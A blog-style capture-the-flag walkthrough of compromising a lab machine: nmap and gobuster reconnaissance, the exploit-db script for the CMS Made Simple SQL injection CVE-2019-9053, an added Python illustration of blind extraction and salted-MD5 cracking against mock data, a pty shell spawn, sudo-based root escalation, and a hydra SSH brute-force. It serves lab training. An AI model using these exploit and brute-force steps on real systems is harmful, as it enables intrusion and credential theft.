SIMPLE CTF Walkthrough

RohanAdapala
4 min read · May 27, 2021


Hello guys, here is another blog of mine. This time I captured the flag in two different ways. Let's get started...

NOTE: The first step is reconnaissance. The more you know about the target, the easier it is to get into its systems or servers.

Step1: Nmap scanning

Command: nmap -sS -sV -A <Target-IP>

(-sS, the SYN scan, needs root privileges; -A already includes version detection, so -sV is redundant but harmless.)

Ports 21, 80 and 2222 are open: FTP, HTTP, and SSH on a non-default port. Port 80 serves a robots.txt, which is an information disclosure, and there may be more hidden directories, so let's check with the gobuster tool.

First Method:

Step 2: GOBUSTER

Command: gobuster dir -u http://<target-IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We found the hidden directory (/simple). Let's open that path in the browser.

A CMS is running there (CMS Made Simple, with its version shown in the page footer). Let's check which vulnerabilities and CVE numbers exist for that version.

We found that it is vulnerable to a SQL injection, CVE-2019-9053 (CMS Made Simple before 2.2.10). Let's search for the exploit on the exploit-db website.

There is an exploit on exploit-db, a Python script that performs the SQL injection. Let's download and run it to get the credentials.

Command: python 46635.py -u http://<Target-IP>/simple/ --crack -w /usr/share/wordlists/rockyou.txt

You will hit an error while running the Python script; the fix I used is shown in the images below.

Run the command again and it starts the SQL injection. It is a blind, time-based injection, so extracting the username, e-mail, password hash and salt takes a while; the --crack option then tries each wordlist entry against the recovered hash.
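To make clear what the exploit script is actually doing while it runs, here is an added illustration of the same two steps (blind character-by-character extraction, then offline cracking of the salted MD5 hash). This is example code written for this walkthrough, not the exploit-db script and not part of the original post. Instead of a live CMS it queries a constructed in-memory "oracle", and the username, salt and password in it are made up; the hash format md5(salt + password) is the one CMS Made Simple uses.

```python
import hashlib
import string

# Constructed sample data standing in for the target's cms_users and cms_siteprefs
# rows (username, salt and password here are made up for this example).
# CMS Made Simple stores the admin password as md5(sitemask_salt + password),
# which is why the exploit needs both the hash and the salt before cracking.
MOCK_SALT = "dbc91f8f3b"
MOCK_PASSWORD = "secret123"
MOCK_DB = {
    "username": "mitch",
    "salt": MOCK_SALT,
    "password": hashlib.md5((MOCK_SALT + MOCK_PASSWORD).encode()).hexdigest(),
}

# Characters tried at each position: enough for lowercase usernames,
# hex digests and hex salts. Extend it if the target may use other characters.
CHARSET = string.ascii_lowercase + string.digits + "_@.-"


def mock_oracle(column: str, position: int, char: str) -> bool:
    """Stand-in for one time-based blind request.

    The real script injects a condition roughly like
    "... AND SUBSTRING(<column>,<position>,1)=<char> AND SLEEP(<n>)"
    and treats a slow response as "yes". Here the answer comes straight
    from the constructed table instead of a network round trip.
    """
    value = MOCK_DB[column]
    return position <= len(value) and value[position - 1] == char


def extract_column(oracle, column: str, max_len: int = 64) -> str:
    """Recover a column value one character at a time from yes/no answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for candidate in CHARSET:
            if oracle(column, pos, candidate):
                recovered += candidate
                break
        else:
            # No candidate matched: the value is shorter than `pos`, so we are done.
            break
    return recovered


def crack_salted_md5(target_hash: str, salt: str, wordlist):
    """Offline cracking step: md5(salt + word) for each wordlist entry."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == target_hash:
            return word
    return None


def run_attack(oracle, wordlist) -> dict:
    """Full chain: extract username, hash and salt, then crack the hash."""
    username = extract_column(oracle, "username")
    pw_hash = extract_column(oracle, "password")
    salt = extract_column(oracle, "salt")
    return {
        "username": username,
        "hash": pw_hash,
        "salt": salt,
        "password": crack_salted_md5(pw_hash, salt, wordlist),
    }


if __name__ == "__main__":
    # Constructed mini wordlist in place of rockyou.txt.
    print(run_attack(mock_oracle, ["password", "letmein", "secret123"]))
```

Each recovered character costs one request per candidate in the charset, and with a time-based oracle each "yes" costs a sleep, which is why the real script is slow. Cracking, by contrast, is purely local: once the hash and salt are out, the wordlist can be as large as you like without touching the target again.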

We got the username and password. Let's use these credentials to log in to SSH on port 2222.

After logging in the shell was not a proper TTY, so I used the usual Python one-liner to spawn one:

Command: python -c 'import pty;pty.spawn("/bin/bash")'

(If you want tab completion and Ctrl-C to work as well, background the shell with Ctrl-Z, run stty raw -echo; fg on your own terminal, then press Enter.)

I found user.txt, which contains the user flag.

Next I needed root.txt, which means escalating to root. The steps are in the images below; the usual first check is sudo -l, which lists the commands the current user can run as root without a password.

Press Enter and you get a root shell. The root flag is in root.txt; open it with cat, nano or vim.

Second Method:

If you look at the nmap output, it says that anonymous FTP login is allowed. Let's try it.

Anonymous login works. Inside there is a pub folder, and in it a file named ForMitch.txt. I pulled it to my machine with:

Command: get ForMitch.txt

Opening it, I found a note addressed to a user named mitch (the file name ForMitch.txt gives the username away), which says his password is weak.

So I used hydra to brute-force his SSH password (note the -s 2222 for the non-default port):

Command: hydra -l mitch -P /usr/share/wordlists/rockyou.txt <Target-Ip> -s 2222 ssh

Hydra finds the password. Then do the same as before: log in over SSH and collect the flags.

Hurray...!🎉 We captured the flag..👌
